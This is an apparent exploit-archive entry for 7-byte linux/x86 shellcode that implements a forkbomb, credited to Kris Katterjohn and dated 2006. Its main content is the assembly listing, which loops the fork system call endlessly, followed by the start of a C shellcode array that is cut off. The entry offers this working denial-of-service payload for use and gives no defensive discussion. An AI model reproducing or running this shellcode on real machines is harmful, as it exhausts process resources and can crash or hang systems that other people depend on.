linux/x86 forkbomb 7 bytes
Exploit for linux/x86 platform in category shellcode ========================== linux/x86 forkbomb 7 bytes ========================== / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode...